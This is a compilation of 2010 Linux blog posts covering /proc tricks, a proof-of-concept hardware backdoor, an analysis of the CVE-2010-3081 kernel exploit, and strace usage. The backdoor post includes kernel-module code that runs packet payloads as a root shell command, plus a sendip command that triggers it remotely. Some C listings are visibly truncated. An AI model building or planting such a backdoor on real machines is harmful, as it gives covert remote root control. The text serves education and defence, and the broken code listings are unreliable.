keegan@lyle$ gcc -Wall -o tightloop tightloop.c
keegan@lyle$ ./tightloop &
[1] 30086
keegan@lyle$ watch -d -n 1 'cat /proc/30086/status | grep ctxt_switches'

You'll see exclusively nonvoluntary context switches. This program isn't making system calls; it just spins the CPU until the kernel decides to let someone else have a turn. Don't forget to kill this useless process!

Staying ahead of the OOM killer

The Linux memory subsystem has a nasty habit of making promises it can't keep. A userspace program can successfully allocate as much memory as it likes. The kernel will only look for free space in physical memory once the program actually writes to the addresses it allocated. And if the kernel can't find enough space, a component called the OOM killer will use an ad-hoc heuristic to choose a victim process and unceremoniously kill it.

Needless to say, this feature is controversial. The kernel has no reliable idea of who's actually responsible for consuming the machine's memory. The victim process may be totally innocent. You can disable memory overcommitting on your own machine, but there's inherent risk in breaking assumptions that processes make — even when those assumptions are harmful.

As a less drastic step, let's keep an eye on the OOM killer so we can predict where it might strike next. The victim process will be the process with the highest "OOM score", which we can read from /proc/$PID/oom_score:

keegan@lyle$ cat oom-scores.bash
for procdir in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+'); do
  printf "%10d %6d %s\n" \
    "$(cat $procdir/oom_score)" \
    "$(basename $procdir)" \
    "$(cat $procdir/cmdline | tr '\0' ' ' | head -c 100)"
done 2>/dev/null | sort -nr | head -n 20

For each process we print the OOM score, the PID (obtained from the directory name) and the process's command line. proc provides string arrays in NULL-delimited format, which we convert using tr. It's important to suppress error output using 2>/dev/null because some of the processes found by find (including find itself) will no longer exist within the loop. Let's see the results:

keegan@lyle$ ./oom-scores.bash 
  13647872  15439 /usr/lib/chromium-browser/chromium-browser --type=plugin
   1516288  15430 /usr/lib/chromium-browser/chromium-browser --type=gpu-process
   1006592  13204 /usr/lib/nspluginwrapper/i386/linux/npviewer.bin --plugin
    687581  15264 /usr/lib/chromium-browser/chromium-browser --type=zygote
    445352  14323 /usr/lib/chromium-browser/chromium-browser --type=renderer
    444930  11255 /usr/lib/chromium-browser/chromium-browser --type=renderer

Unsurprisingly, my web browser and Flash plugin are prime targets for the OOM killer. But the rankings might change if some runaway process caused an actual out-of-memory condition. Let's (carefully!) run a program that will (slowly!) eat 500 MB of RAM:

keegan@lyle$ cat oomnomnom.c
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#define SIZE (10*1024*1024)

int main() {
  int i;
  for (i=0; i<50; i++) {
    void *m = mmap(NULL, SIZE, PROT_WRITE,
    memset(m, 0x80, SIZE);
  return 0;

On each loop iteration, we ask for 10 megabytes of memory as a private, anonymous (non-file-backed) mapping. We then write to this region, so that the kernel will have to allocate some physical RAM. Now we'll watch OOM scores and free memory as this program runs:

keegan@lyle$ gcc -Wall -o oomnomnom oomnomnom.c
keegan@lyle$ ./oomnomnom &
[1] 19697
keegan@lyle$ watch -d -n 1 './oom-scores.bash; echo; free -m'

You'll see oomnomnom climb to the top of the list.

So we've seen a few ways that proc can help us solve problems. Actually, we've only scratched the surface. Inside each process's directory you'll find information about resource limits, chroots, CPU affinity, page faults, and much more. What are your favorite proc tricks? Let us know in the comments!


Tuesday Oct 26, 2010

Hosting backdoors in hardware

Have you ever had a machine get compromised? What did you do? Did you run rootkit checkers and reboot? Did you restore from backups or wipe and reinstall the machines, to remove any potential backdoors?

In some cases, that may not be enough. In this blog post, we're going to describe how we can gain full control of someone's machine by giving them a piece of hardware which they install into their computer. The backdoor won't leave any trace on the disk, so it won't be eliminated even if the operating system is reinstalled. It's important to note that our ability to do this does not depend on exploiting any bugs in the operating system or other software; our hardware-based backdoor would work even if all the software on the system worked perfectly as designed.

I'll let you figure out the social engineering side of getting the hardware installed (birthday "present"?), and instead focus on some of the technical details involved.

Our goal is to produce a PCI card which, when present in a machine running Linux, modifies the kernel so that we can control the machine remotely over the Internet. We're going to make the simplifying assumption that we have a virtual machine which is a replica of the actual target machine. In particular, we know the architecture and exact kernel version of the target machine. Our proof-of-concept code will be written to only work on this specific kernel version, but it's mainly just a matter of engineering effort to support a wide range of kernels.

Modifying the kernel with a kernel module

The easiest way to modify the behavior of our kernel is by loading a kernel module. Let's start by writing a module that will allow us to remotely control a machine.

IP packets have a field called the protocol number, which is how systems distinguish between TCP and UDP and other protocols. We're going to pick an unused protocol number, say, 163, and have our module listen for packets with that protocol number. When we receive one, we'll execute its data payload in a shell running as root. This will give us complete remote control of the machine.

The Linux kernel has a global table inet_protos consisting of a struct net_protocol * for each protocol number. The important field for our purposes is handler, a pointer to a function which takes a single argument of type struct sk_buff *. Whenever the Linux kernel receives an IP packet, it looks up the entry in inet_protos corresponding to the protocol number of the packet, and if the entry is not NULL, it passes the packet to the handler function. The struct sk_buff type is quite complicated, but the only field we care about is the data field, which is a pointer to the beginning of the payload of the packet (everything after the IP header). We want to pass the payload as commands to a shell running with root privileges. We can create a user-mode process running as root using the call_usermodehelper function, so our handler looks like this:

int exec_packet(struct sk_buff *skb)
	char *argv[4] = {"/bin/sh", "-c", skb->data, NULL};
	char *envp[1] = {NULL};
	call_usermodehelper("/bin/sh", argv, envp, UMH_NO_WAIT);
	return 0;
We also have to define a struct net_protocol which points to our packet handler, and register it when our module is loaded:

const struct net_protocol proto163_protocol = {
	.handler = exec_packet,
	.no_policy = 1,
	.netns_ok = 1

int init_module(void)
	return (inet_add_protocol(&proto163_protocol, 163) < 0);
Let's build and load the module:
rwbarton@target:~$ make
make -C /lib/modules/2.6.32-24-generic/build M=/home/rwbarton modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.32-24-generic'
  CC [M]  /home/rwbarton/exec163.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/rwbarton/exec163.mod.o
  LD [M]  /home/rwbarton/exec163.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-24-generic'
rwbarton@target:~$ sudo insmod exec163.ko
Now we can use sendip (available in the sendip Ubuntu package) to construct and send a packet with protocol number 163 from a second machine (named control) to the target machine:

rwbarton@control:~$ echo -ne 'touch /tmp/x\0' > payload
rwbarton@control:~$ sudo sendip -p ipv4 -is 0 -ip 163 -f payload $targetip
rwbarton@target:~$ ls -l /tmp/x
-rw-r--r-- 1 root root 0 2010-10-12 14:53 /tmp/x
Great! It worked. Note that we have to send a null-terminated string in the payload, because that's what call_usermodehelper expects to find in argv and we didn't add a terminator in exec_packet.

Modifying the on-disk kernel

In the previous section we used the module loader to make our changes to the running kernel. Our next goal is to make these changes by altering the kernel on the disk. This is basically an application of ordinary binary patching techniques, so we're just going to give a high-level overview of what needs to be done.

The kernel lives in the /boot directory; on my test system, it's called /boot/vmlinuz-2.6.32-24-generic. This file actually contains a compressed version of the kernel, along with the code which decompresses it and then jumps to the start. We're going to modify this code to make a few changes to the decompressed image before executing it, which have the same effect as loading our kernel module did in the previous section.

When we used the kernel module loader to make our changes to the kernel, the module loader performed three important tasks for us:

  1. it allocated kernel memory to store our kernel module, including both code (the exec_packet function) and data (proto163_protocol and the string constants in exec_packet) sections;
  2. it performed relocations, so that, for example, exec_packet knows the addresses of the kernel functions it needs to call such as kfree_skb, as well as the addresses of its string constants;
  3. it ran our init_module function.
We have to address each of these points in figuring out how to apply our changes without making use of the module loader.

The second and third points are relatively straightforward thanks to our simplifying assumption that we know the exact kernel version on the target system. We can look up the addresses of the kernel functions our module needs to call by hand, and define them as constants in our code. We can also easily patch the kernel's startup function to install a pointer to our proto163_protocol in inet_protos[163], since we have an exact copy of its code.

The first point is a little tricky. Normally, we would call kmalloc to allocate some memory to store our module's code and data, but we need to make our changes before the kernel has started running, so the memory allocator won't be initialized yet. We could try to find some code to patch that runs late enough that it is safe to call kmalloc, but we'd still have to find somewhere to store that extra code.

What we're going to do is cheat and find some data which isn't used for anything terribly important, and overwrite it with our own data. In general, it's hard to be sure what a given chunk of kernel image is used for; even a large chunk of zeros might be part of an important lookup table. However, we can be rather confident that any error messages in the kernel image are not used for anything besides being displayed to the user. We just need to find an error message which is long enough to provide space for our data, and obscure enough that it's unlikely to ever be triggered. We'll need well under 180 bytes for our data, so let's look for strings in the kernel image which are at least that long:

rwbarton@target:~$ strings vmlinux | egrep  '^.{180}' | less
One of the output lines is this one:
<4>Attempt to access file with crypto metadata only in the extended attribute region, but eCryptfs was mounted without xattr support enabled. eCryptfs will not treat this like an encrypted file.
This sounds pretty obscure to me, and a Google search doesn't find any occurrences of this message which aren't from the kernel source code. So, we're going to just overwrite it with our data.

Having worked out what changes need to be applied to the decompressed kernel, we can modify the vmlinuz file so that it applies these changes after performing the decompression. Again, we need to find a place to store our added code, and conveniently enough, there are a bunch of strings used as error messages (in case decompression fails). We don't expect the decompression to fail, because we didn't modify the compressed image at all. So we'll overwrite those error messages with code that applies our patches to the decompressed kernel, and modify the code in vmlinuz that decompresses the kernel to jump to our code after doing so. The changes amount to 5 bytes to write that jmp instruction, and about 200 bytes for the code and data that we use to patch the decompressed kernel.

Modifying the kernel during the boot process

Our end goal, however, is not to actually modify the on-disk kernel at all, but to create a piece of hardware which, if present in the target machine when it is booted, will cause our changes to be applied to the kernel. How can we accomplish that?

The PCI specification defines a "expansion ROM" mechanism whereby a PCI card can include a bit of code for the BIOS to execute during the boot procedure. This is intended to give the hardware a chance to initialize itself, but we can also use it for our own purposes. To figure out what code we need to include on our expansion ROM, we need to know a little more about the boot process.

When a machine boots up, the BIOS initializes the hardware, then loads the master boot record from the boot device, generally a hard drive. Disks are traditionally divided into conceptual units called sectors of 512 bytes each. The master boot record is the first sector on the drive. After loading the master boot record into memory, the BIOS jumps to the beginning of the record.

On my test system, the master boot record was installed by GRUB. It contains code to load the rest of the GRUB boot loader, which in turn loads the /boot/vmlinuz-2.6.32-24-generic image from the disk and executes it. GRUB contains a built-in driver which understands the ext4 filesystem layout. However, it relies on the BIOS to actually read data from the disk, in much the same way that a user-level program relies on an operating system to access the hardware. Roughly speaking, when GRUB wants to read some sectors off the disk, it loads the start sector, number of sectors to read, and target address into registers, and then invokes the int 0x13 instruction to raise an interrupt. The CPU has a table of interrupt descriptors, which specify for each interrupt number a function pointer to call when that interrupt is raised. During initialization, the BIOS sets up these function pointers so that, for example, the entry corresponding to interrupt 0x13 points to the BIOS code handling hard drive IO.

Our expansion ROM is run after the BIOS sets up these interrupt descriptors, but before the master boot record is read from the disk. So what we'll do in the expansion ROM code is overwrite the entry for interrupt 0x13. This is actually a legitimate technique which we would use if we were writing an expansion ROM for some kind of exotic hard drive controller, which a generic BIOS wouldn't know how to read, so that we could boot off of the exotic hard drive. In our case, though, what we're going to make the int 0x13 handler do is to call the original interrupt handler, then check whether the data we read matches one of the sectors of /boot/vmlinuz-2.6.32-24-generic that we need to patch. The ext4 filesystem stores files aligned on sector boundaries, so we can easily determine whether we need to patch a sector that's just been read by inspecting the first few bytes of the sector. Then we return from our custom int 0x13 handler. The code for this handler will be stored on our expansion ROM, and the entry point of our expansion ROM will set up the interrupt descriptor entry to point to it.

In summary, the boot process of the system with our PCI card inserted looks like this:

  • The BIOS starts up and performs basic initialization, including setting up the interrupt descriptor table.
  • The BIOS runs our expansion ROM code, which hooks the int 0x13 handler so that it will apply our patch to the vmlinuz file when it is read off the disk.
  • The BIOS loads the master boot record installed by GRUB, and jumps to it. The master boot record loads the rest of GRUB.
  • GRUB reads the vmlinuz file from the disk, but our custom int 0x13 handler applies our patches to the kernel before returning.
  • GRUB jumps to the vmlinuz entry point, which decompresses the kernel image. Our modifications to vmlinuz cause it to overwrite a string constant with our exec_packet function and associated data, and also to overwrite the end of the startup code to install a pointer to this data in inet_protos[163].
  • The startup code of the decompressed kernel runs and installs our handler in inet_protos[163].
  • The kernel continues to boot normally.
We can now control the machine remotely over the Internet by sending it packets with protocol number 163.

One neat thing about this setup is that it's not so easy to detect that anything unusual has happened. The running Linux system reads from the disk using its own drivers, not BIOS calls via the real-mode interrupt table, so inspecting the on-disk kernel image will correctly show that it is unmodified. For the same reason, if we use our remote control of the machine to install some malicious software which is then detected by the system administrator, the usual procedure of reinstalling the operating system and restoring data from backups will not remove our backdoor, since it is not stored on the disk at all.

What does all this mean in practice? Just like you should not run untrusted software, you should not install hardware provided by untrusted sources. Unless you work for something like a government intelligence agency, though, you shouldn't realistically worry about installing commodity hardware from reputable vendors. After all, you're already also trusting the manufacturer of your processor, RAM, etc., as well as your operating system and compiler providers. Of course, most real-world vulnerabilities are due to mistakes and not malice. An attacker can gain control of systems by exploiting bugs in popular operating systems much more easily than by distributing malicious hardware.


Wednesday Sep 22, 2010

Anatomy of an exploit: CVE-2010-3081

It has been an exciting week for most people running 64-bit Linux systems. Shortly after "Ac1dB1tch3z" released his or her exploit of the vulnerability known as CVE-2010-3081, we saw this exploit aggressively compromising machines, with reports of compromises all over the hosting industry and many machines using our diagnostic tool and testing positive for the backdoors left by the exploit.

The talk around the exploit has mostly been panic and mitigation, though, so now that people have had time to patch their machines and triage their compromised systems, what I'd like to do for you today is talk about how this bug worked, how the exploit worked, and what we can learn about Linux security.

The Ingredients of an Exploit

There are three basic ingredients that typically go into a kernel exploit: the bug, the target, and the payload. The exploit triggers the bug -- a flaw in the kernel -- to write evil data corrupting the target, which is some kernel data structure. Then it prods the kernel to look at that evil data and follow it to run the payload, a snippet of code that gives the exploit the run of the system.

The bug is the one ingredient that is unique to a particular vulnerability. The target and the payload may be reused by an attacker in exploits for other vulnerabilities -- if 'Ac1dB1tch3z' didn't copy them already from an earlier exploit, by himself or by someone else, he or she will probably reuse them in future exploits.

Let's look at each of these in more detail.

The Bug: CVE-2010-3081

An exploit starts with a bug, or vulnerability, some kernel flaw that allows a malicious user to make a mess -- to write onto its target in the kernel. This bug is called CVE-2010-3081, and it allows a user to write a handful of words into memory almost anywhere in the kernel.

The bug was present in Linux's 'compat' subsystem, which is used on 64-bit systems to maintain compatibility with 32-bit binaries by providing all the system calls in 32-bit form. Now Linux has over 300 different system calls, so this was a big job. The Linux developers made certain choices in order to keep the task manageable:

  • We don't want to rewrite the code that actually does the work of each system call, so instead we have a little wrapper function for compat mode.
  • The wrapper function needs to take arguments from userspace in 32-bit form, then put them in 64-bit form to pass to the code that does the system call's work. Often some arguments are structs which are laid out differently in the 32-bit and 64-bit worlds, so we have to make a new 64-bit struct based on the user's 32-bit struct.
  • The code that does the work expects to find the struct in the user's address space, so we have to put ours there. Where in userspace can we find space without stepping on toes? The compat subsystem provides a function to find it on the user's stack.
Now, here's the core problem. That allocation routine went like this:
  static inline void __user *compat_alloc_user_space(long len)
          struct pt_regs *regs = task_pt_regs(current);
          return (void __user *)regs->sp - len;
The way you use it looks a lot like the old familiar malloc(), or the kernel's kmalloc(), or any number of other memory-allocation routines: you pass in the number of bytes you need, and it returns a pointer where you are supposed to read and write that many bytes to your heart's content. But it comes -- came -- with a special catch, and it's a big one: before you used that memory, you had to check that it was actually OK for the user to use that memory, with the kernel's access_ok() function. If you've ever helped maintain a large piece of software, you know it's inevitable that someone will eventually be fooled by the analogy, miss the incongruence, and forget that check.

Fortunately the kernel developers are smart and careful people, and they defied that inevitability almost everywhere. Unfortunately, they missed it in at least two places. One of those is this bug. If we call getsockopt() in 32-bit fashion on the socket that represents a network connection over IP, and pass an optname of MCAST_MSFILTER, then in a 64-bit kernel we end up in compat_mc_getsockopt():

  int compat_mc_getsockopt(struct sock *sock, int level, int optname,
          char __user *optval, int __user *optlen,
          int (*getsockopt)(struct sock *,int,int,char __user *,int __user *))
This function calls compat_alloc_user_space(), and it fails to check the result is OK for the user to access -- and by happenstance the struct it's making room for has a variable length, supplied by the user.

So the attacker's strategy goes like so:

  • Make an IP socket in a 32-bit process, and call getsockopt() on it with optname MCAST_MSFILTER. Pass in a giant length value, almost the full possible 2GB. Because compat_alloc_user_space() finds space by just subtracting the length from the user's stack pointer, with a giant length the address wraps around, down past zero, to where the kernel lives at the top of the address space.
  • When the bug fires, the kernel will copy the original struct, which the attacker provides, into the space it has just 'allocated', starting at that address up in kernel-land. So fill that struct with, say, an address for evil code.
  • Tune the length value so that the address where the 'new struct' lives is a particularly interesting object in the kernel, a target.
The fix for CVE-2010-3081 was to make compat_alloc_user_space() call access_ok() to check for itself.

More technical details are ably explained in the original report by security researcher Ben Hawkes, who brought the vulnerability to light.

The Target: Function Pointers Everywhere

The target is some place in the kernel where if we make the right mess, we can leverage that into the kernel running the attacker's code, the payload. Now the kernel is full of function pointers, because secretly it's object oriented. So for example the attacker may poke some userspace object like a special file to cause the kernel to invoke a certain method on it -- and before doing so will target that method's function pointer in the object's virtual method table (called an "ops struct" in kernel lingo) which says where to find all the methods, scribbling over it with the address of the payload.

A key constraint for the attacker is to pick something that will never be used in normal operation, so that nothing goes awry to catch the user's attention. This exploit uses one of three targets: the interrupt descriptor table, timer_list_fops, and the LSM subsystem.

  • The interrupt descriptor table (IDT) is morally a big table of function pointers. When an interrupt happens, the hardware looks it up in the IDT, which the kernel has set up in advance, and calls the handler function it finds there. It's more complicated than that because each entry in the table also needs some metadata to say who's allowed to invoke the interrupt, whether the handler should be called with user or kernel privileges, etc. This exploit picks interrupt number 221, higher than anybody normally uses, and carefully sets up that entry in the IDT so that its own evil code is the handler and runs in kernel mode. Then with the single instruction int $221, it makes that interrupt happen.
  • timer_list_fops is the "ops struct" or virtual method table for a special file called /proc/timer_list. Like many other special files that make up the proc filesystem, /proc/timer_list exists to provide kernel information to userspace. This exploit scribbles on the pointer for the poll method, which is normally not even provided for this file (so it inherits a generic behavior), and which nobody ever uses. Then it just opens that file and calls poll(). I believe this could just as well have been almost any file in /proc/.
  • The LSM approach attacks several different ops structs of type security_operations, the tables of methods for different 'Linux security modules'. These are gigantic structs with hundreds of function pointers; the one the exploit targets in each struct is msg_queue_msgctl, the 100th one. Then it issues a msgctl system call, which causes the kernel to check whether it's authorized by calling the msg_queue_msgctl method... which is now the exploit's code.
Why three different targets? One is enough, right? The answer is flexibility. Some kernels don't have timer_list_fops. Some kernels have it, but don't make available a symbol to find its address, and the address will vary from kernel to kernel, so it's tricky to find. Other kernels pose the same obstacle with the security_operations structs, or use a different security_operations than the ones the exploit corrupts. Different kernels offer different targets, so a widely applicable exploit has to have several targets in its repertoire. This one picks and chooses which one to use depending on what it can find.

The Payload: Steal Privileges

Finally, once the bug is used to corrupt the target and the target is triggered, the kernel runs the attacker's payload, or shellcode. A simple exploit will run the bare minimum of code inside the kernel, because it's much easier to write code that can run in userspace than in kernelspace -- so it just sets the process up to have the run of the system, and then returns.

This means setting the process's user ID to 0, root, so that everything else it does is with root privileges. A process's user ID is stored in different places in different kernel versions -- the system became more complicated in 2.6.29, and again in 2.6.30 -- so the exploit needs to have flexibility again. This one checks the version with uname and assembles the payload accordingly.

This exploit can also clear a couple of flags to turn off SELinux, with code it optionally includes in the payload -- more flexibility. Then it lets the kernel return to userspace, and starts a root shell.

In a real attack, that root shell might be used to replace key system binaries, steal data, start a botnet daemon, or install backdoors on disk to cement the attacker's control and hide their presence.

Flexibility, or, You Can't Trust a Failing Exploit

All the points of flexibility in this exploit illustrate a key lesson: you can't determine you're vulnerable just because an exploit fails. For example, on a Fedora 13 system, this exploit errors out with a message like this:
  $ ./ABftw
  Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
  $$$ Kallsyms +r
  $$$ K3rn3l r3l3as3:
  !!! Err0r 1n s3tt1ng cr3d sh3llc0d3z 
Sometimes a system administrator sees an exploit fail like that and concludes they're safe. "Oh, Red Hat / Debian / my vendor says I'm vulnerable", they may say. "But the exploit doesn't work, so they're just making stuff up, right?"

Unfortunately, this can be a fatal mistake. In fact, the machine above is vulnerable. The error message only comes about because the exploit can't find the symbol per_cpu__current_task, whose value it needs in the payload; it's the address at which to find the kernel's main per-process data structure, the task_struct. But a skilled attacker can find the task_struct without that symbol, by following pointers from other known data structures in the kernel.

In general, there is almost infinitely much work an exploit writer could put in to make the exploit function on more and more kernels. Use a wider repertoire of targets; find missing symbols by following pointers or by pattern-matching in the kernel; find missing symbols by brute force, with a table prepared in advance; disable SELinux, as this exploit does, or grsecurity; or add special code to navigate the data structures of unusual kernels like OpenVZ. If the bug is there in a kernel but the exploit breaks, it's only a matter of work or more work to extend the exploit to function there too.

That's why the only way to know that a given kernel is not affected by a vulnerability is a careful examination of the bug against the kernel's source code and configuration, and never to rely on a failing exploit -- and even that examination can sometimes be mistakenly optimistic. In practice, for a busy system administrator this means that when the vendor recommends you update, the only safe choice is to update.


Thursday Aug 05, 2010

Strace -- The Sysadmin's Microscope

Sometimes as a sysadmin the logfiles just don't cut it, and to solve a problem you need to know what's really going on. That's when I turn to strace -- the system-call tracer.

A system call, or syscall, is where a program crosses the boundary between user code and the kernel. Fortunately for us using strace, that boundary is where almost everything interesting happens in a typical program.

The two basic jobs of a modern operating system are abstraction and multiplexing. Abstraction means, for example, that when your program wants to read and write to disk it doesn't need to speak the SATA protocol, or SCSI, or IDE, or USB Mass Storage, or NFS. It speaks in a single, common vocabulary of directories and files, and the operating system translates that abstract vocabulary into whatever has to be done with the actual underlying hardware you have. Multiplexing means that your programs and mine each get fair access to the hardware, and don't have the ability to step on each other -- which means your program can't be permitted to skip the kernel, and speak raw SATA or SCSI to the actual hardware, even if it wanted to.

So for almost everything a program wants to do, it needs to talk to the kernel. Want to read or write a file? Make the open() syscall, and then the syscalls read() or write(). Talk on the network? You need the syscalls socket(), connect(), and again read() and write(). Make more processes? First clone() (inside the standard C library function fork()), then you probably want execve() so the new process runs its own program, and you probably want to interact with that process somehow, with one of wait4(), kill(), pipe(), and a host of others. Even looking at the clock requires a system call, clock_gettime(). Every one of those system calls will show up when we apply strace to the program.

In fact, just about the only thing a process can do without making a telltale system call is pure computation -- using the CPU and RAM and nothing else. As a former algorithms person, that's what I used to think was the fun part. Fortunately for us as sysadmins, very few real-life programs spend very long in that pure realm between having to deal with a file or the network or some other part of the system, and then strace picks them up again.

Let's look at a quick example of how strace solves problems.

Use #1: Understand A Complex Program's Actual Behavior
One day, I wanted to know which Git commands take out a certain lock -- I had a script running a series of different Git commands, and it was failing sometimes when run concurrently because two commands tried to hold the lock at the same time.

Now, I love sourcediving, and I've done some Git hacking, so I spent some time with the source tree investigating this question. But this code is complex enough that I was still left with some uncertainty. So I decided to get a plain, ground-truth answer to the question: if I run "git diff", will it grab this lock?

Strace to the rescue. The lock is on a file called index.lock. Anything trying to touch the file will show up in strace. So we can just trace a command the whole way through and use grep to see if index.lock is mentioned:

$ strace git status 2>&1 >/dev/null | grep index.lock
open(".git/index.lock", O_RDWR|O_CREAT|O_EXCL, 0666) = 3
rename(".git/index.lock", ".git/index") = 0

$ strace git diff 2>&1 >/dev/null | grep index.lock

So git status takes the lock, and git diff doesn't.

Interlude: The Toolbox
To help make it useful for so many purposes, strace takes a variety of options to add or cut out different kinds of detail and help you see exactly what's going on.

In Medias Res, If You Want
Sometimes we don't have the luxury of starting a program over to run it under strace -- it's running, it's misbehaving, and we need to find out what's going on. Fortunately strace handles this case with ease. Instead of specifying a command line for strace to execute and trace, just pass -p PID where PID is the process ID of the process in question -- I find pstree -p invaluable for identifying this -- and strace will attach to that program, while it's running, and start telling you all about it.

When I use strace, I almost always pass the -tt option. This tells me when each syscall happened -- -t prints it to the second, -tt to the microsecond. For system administration problems, this often helps a lot in correlating the trace with other logs, or in seeing where a program is spending too much time.

For performance issues, the -T option comes in handy too -- it tells me how long each individual syscall took from start to finish.

By default strace already prints the strings that the program passes to and from the system -- filenames, data read and written, and so on. To keep the output readable, it cuts off the strings at 32 characters. You can see more with the -s option -- -s 1024 makes strace print up to 1024 characters for each string -- or cut out the strings entirely with -s 0.

Sometimes you want to see the full data flowing in just a few directions, without cluttering your trace with other flows of data. Here the options -e read= and -e write= come in handy.

For example, say you have a program talking to a database server, and you want to see the SQL queries, but not the voluminous data that comes back. The queries and responses go via write() and read() syscalls on a network socket to the database. First, take a preliminary look at the trace to see those syscalls in action:

$ strace -p 9026
Process 9026 attached - interrupt to quit
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52

Those write() syscalls are the SQL queries -- we can make out the SELECT foo FROM bar, and then it trails off. To see the rest, note the file descriptor the syscalls are happening on -- the first argument of read() or write(), which is 3 here. Pass that file descriptor to -e write=:

$ strace -p 9026 -e write=3
Process 9026 attached - interrupt to quit
read(3, "\1\0\0\1\1A\0\0\2\3def\7youtomb\tartifacts\ta"..., 16384) = 116
poll([{fd=3, events=POLLIN|POLLPRI}], 1, 0) = 0 (Timeout)
write(3, "0\0\0\0\3SELECT timestamp FROM artifa"..., 52) = 52
 | 00000  30 00 00 00 03 53 45 4c  45 43 54 20 74 69 6d 65  0....SEL ECT time |
 | 00010  73 74 61 6d 70 20 46 52  4f 4d 20 61 72 74 69 66  stamp FR OM artif |
 | 00020  61 63 74 73 20 57 48 45  52 45 20 69 64 20 3d 20  acts WHE RE id =  |
 | 00030  31 34 35 34                                       1454              |

and we see the whole query. It's both printed and in hex, in case it's binary. We could also get the whole thing with an option like -s 1024, but then we'd see all the data coming back via read() -- the use of -e write= lets us pick and choose.

Filtering the Output
Sometimes the full syscall trace is too much -- you just want to see what files the program touches, or when it reads and writes data, or some other subset. For this the -e trace= option was made. You can select a named suite of system calls like -e trace=file (for syscalls that mention filenames) or -e trace=desc (for read() and write() and friends, which mention file descriptors), or name individual system calls by hand. We'll use this option in the next example.

Child Processes
Sometimes the process you trace doesn't do the real work itself, but delegates it to child processes that it creates. Shell scripts and Make runs are notorious for taking this behavior to the extreme. If that's the case, you may want to pass -f to make strace "follow forks" and trace child processes, too, as soon as they're made.

For example, here's a trace of a simple shell script, without -f:

$ strace -e trace=process,file,desc sh -c \
   'for d in .git/objects/*; do ls $d >/dev/null; done'
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=101992, ...}) = 0
clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f4b68af5770) = 11948
wait4(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 11948
--- SIGCHLD (Child exited) @ 0 (0) --
wait4(-1, 0x7fffc3473604, WNOHANG, NULL) = -1 ECHILD (No child processes)

Not much to see here -- all the real work was done inside process 11948, the one created by that clone() syscall.

Here's the same script traced with -f (and the trace edited for brevity):

$ strace -f -e trace=process,file,desc sh -c \
   'for d in .git/objects/*; do ls $d >/dev/null; done'
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=101992, ...}) = 0
clone(Process 10738 attached
child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0x7f5a93f99770) = 10738
[pid 10682] wait4(-1, Process 10682 suspended

[pid 10738] open("/dev/null", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3
[pid 10738] dup2(3, 1)                  = 1
[pid 10738] close(3)                    = 0
[pid 10738] execve("/bin/ls", ["ls", ".git/objects/28"], [/* 25 vars */]) = 0
[... setup of C standard library omitted ...]
[pid 10738] stat(".git/objects/28", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
[pid 10738] open(".git/objects/28", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 3
[pid 10738] getdents(3, /* 40 entries */, 4096) = 2480
[pid 10738] getdents(3, /* 0 entries */, 4096) = 0
[pid 10738] close(3)                    = 0
[pid 10738] write(1, "04102fadac20da3550d381f444ccb5676"..., 1482) = 1482
[pid 10738] close(1)                    = 0
[pid 10738] close(2)                    = 0
[pid 10738] exit_group(0)               = ?
Process 10682 resumed
Process 10738 detached
<... wait4 resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 0}], 0, NULL) = 10738
--- SIGCHLD (Child exited) @ 0 (0) ---

Now this trace could be a miniature education in Unix in itself -- future blog post? The key thing is that you can see ls do its work, with that open() call followed by getdents().

The output gets cluttered quickly when multiple processes are traced at once, so sometimes you want -ff, which makes strace write each process's trace into a separate file.

Use #2: Why/Where Is A Program Stuck?
Sometimes a program doesn't seem to be doing anything. Most often, that means it's blocked in some system call. Strace to the rescue.

$ strace -p 22067
Process 22067 attached - interrupt to quit
flock(3, LOCK_EX

Here it's blocked trying to take out a lock, an exclusive lock (LOCK_EX) on the file it's opened as file descriptor 3. What file is that?

$ readlink /proc/22067/fd/3

Aha, it's the file /tmp/foobar.lock. And what process is holding that lock?

$ lsof | grep /tmp/foobar.lock
 command   21856       price    3uW     REG 253,88       0 34443743 /tmp/foobar.lock
 command   22067       price    3u      REG 253,88       0 34443743 /tmp/foobar.lock

Process 21856 is holding the lock. Now we can go figure out why 21856 has been holding the lock for so long, whether 21856 and 22067 really need to grab the same lock, etc.

Other common ways the program might be stuck, and how you can learn more after discovering them with strace:

  • Waiting on the network. Use lsof again to see the remote hostname and port.
  • Trying to read a directory. Don't laugh -- this can actually happen when you have a giant directory with many thousands of entries. And if the directory used to be giant and is now small again, on a traditional filesystem like ext3 it becomes a long list of "nothing to see here" entries, so a single syscall may spend minutes scanning the deleted entries before returning the list of survivors.
  • Not making syscalls at all. This means it's doing some pure computation, perhaps a bunch of math. You're outside of strace's domain; good luck.

Uses #3, #4, ...
A post of this length can only scratch the surface of what strace can do in a sysadmin's toolbox. Some of my other favorites include

  • As a progress bar. When a program's in the middle of a long task and you want to estimate if it'll be another three hours or three days, strace can tell you what it's doing right now -- and a little cleverness can often tell you how far that places it in the overall task.
